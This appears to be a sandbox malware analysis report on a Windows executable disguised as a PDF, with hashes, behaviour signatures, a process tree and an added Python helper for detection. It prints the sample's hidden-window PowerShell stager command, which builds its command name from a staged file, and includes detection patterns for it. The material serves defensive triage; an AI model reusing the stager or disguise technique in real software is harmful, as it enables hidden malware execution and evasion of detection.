Analysis
max time kernel: 148s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240704-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-07-2024 09:49
Static task: static1
Behavioral task: behavioral1
  Sample: Vendor Data Requirements·pdf.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: Vendor Data Requirements·pdf.exe
  Resource: win10v2004-20240704-en
General
Target: Vendor Data Requirements·pdf.exe (the character before "pdf" is a middle dot, not a period: the name is styled to look like a PDF, but the real extension is .exe)
Size: 401KB
MD5: f1043033237fa935ef9af72415e657a1
SHA1: b1ce2973b99811fe469ae6b4c450e97d4d4f4a20
SHA256: a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
SHA512: 1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b
SSDEEP: 6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell with the display window hidden.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoC)
  pid   pid_target  process       target process
  4088  3060        WerFault.exe  powershell.exe
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid   process
  3060  powershell.exe  (reported 9 times)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   process
  Token: SeDebugPrivilege  3060  powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid   process                           target process
  PID 4056 wrote to memory of 3060  4056  Vendor Data Requirements·pdf.exe  powershell.exe  (reported 3 times)
Processes
1. C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"
   PID: 4056
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
      PID: 3060
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 2452
         PID: 4088
         - Program crash
1. C:\Windows\SysWOW64\WerFault.exe
   Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3060 -ip 3060
   PID: 1712
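The PowerShell child (PID 3060) is the interesting node in this tree: the parent writing to the child's memory three times is what ordinary process creation looks like too, so the signal is the command line, not the WriteProcessMemory count. The command line reads a file with a non-script extension from AppData\Roaming, takes three characters at a fixed offset of its single-line content, and invokes that three-character string as a command with the call operator (`.$Byggryn(...)`), passing the whole file as the argument. The command name therefore never appears on the command line, which is the point of the construction. The helper below is an added example written for this page, not part of the sandbox report or of the sample: it parses that command line without executing it, resolves the SubString offset against a constructed stand-in for delysten.imp (the real file is not on the page, and the "iex" token in the stand-in is an assumption chosen for illustration), and returns the indicators a detection rule over process-creation logs (Sysmon Event ID 1, Windows 4688) would key on.

```python
"""Added triage helper for the hidden-window PowerShell stager in the process tree
above. Example code written for this page, not part of the sandbox report or of
the sample. It never runs the command line; it parses it, resolves the SubString
offset against a constructed stand-in for the staged file, and lists detection
indicators for the Get-Content / SubString / call-operator chain."""
import re
from dataclasses import dataclass
from typing import Optional

# Command line of PID 3060, copied from the report's process tree.
OBSERVED_CMDLINE = r'''"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"'''


@dataclass(frozen=True)
class StagerCall:
    content_var: str  # variable holding the staged script text
    op_var: str       # variable holding the runtime-built command name
    script_path: str  # file read by Get-Content
    offset: int       # character index passed to SubString
    length: int       # number of characters taken


# Shape: $a=Get-Content '<path>';$b=$a.SubString(<off>,<len>);.$b($a)   (& also accepted)
STAGER_RE = re.compile(
    r"\$(?P<content>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<op>\w+)\s*=\s*\$(?P=content)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;"
    r"\s*[.&]\s*\$(?P=op)\s*\(\s*\$(?P=content)\s*\)",
    re.IGNORECASE,
)


def parse_stager(cmdline: str) -> Optional[StagerCall]:
    """Extract the staging parameters from a process command line, or None if absent."""
    m = STAGER_RE.search(cmdline)
    if m is None:
        return None
    return StagerCall(m["content"], m["op"], m["path"], int(m["off"]), int(m["len"]))


def recover_operator(script_text: str, call: StagerCall) -> str:
    """Return the token the stager would invoke through the call operator.

    Get-Content without -Raw returns one string per line, so .SubString(offset, n)
    indexes a single string only when the file is one line long; that precondition
    is checked here instead of being assumed.
    """
    body = script_text.rstrip("\r\n")
    if "\n" in body:
        raise ValueError("staged file has multiple lines; offset is not a single-string index")
    if call.offset + call.length > len(body):
        raise ValueError("offset lies beyond the end of the staged file")
    return body[call.offset:call.offset + call.length]


def indicators(cmdline: str) -> list[str]:
    """Detection indicators for this stager shape in a PowerShell command line."""
    hits = []
    # -w, -win and -windowstyle are all accepted spellings of the parameter
    if re.search(r"-w\w*\s+hidden\b", cmdline, re.IGNORECASE):
        hits.append("hidden window")
    call = parse_stager(cmdline)
    if call is not None:
        hits.append("command name built at runtime from file contents")
        if not call.script_path.lower().endswith(".ps1"):
            hits.append("staged script with non-.ps1 extension")
        if "\\appdata\\roaming\\" in call.script_path.lower():
            hits.append("staged script under AppData\\Roaming")
    return hits


# Constructed stand-in for delysten.imp (its real content is not on the page): one
# long line with a three-character token at the observed offset. "iex" is an
# assumption chosen for the example, not a fact about the sample.
CONSTRUCTED_SCRIPT = "#" * 71093 + "iex" + " '# remainder of the staged script'"

if __name__ == "__main__":
    call = parse_stager(OBSERVED_CMDLINE)
    print(call)
    print("operator:", recover_operator(CONSTRUCTED_SCRIPT, call))
    print("indicators:", indicators(OBSERVED_CMDLINE))
```

In a live investigation the stand-in is replaced by the file collected from the host; the offset check in `recover_operator` matters because the sandbox only shows the command line, and a multi-line or truncated copy of the staged file would silently return the wrong three characters.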
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 69KB
  MD5: 8172795f7c8cfb7cc597e879d2b0b468
  SHA1: 811797a9309a1bc3429f3bc7735eb6af1a7c80dc
  SHA256: 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
  SHA512: 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322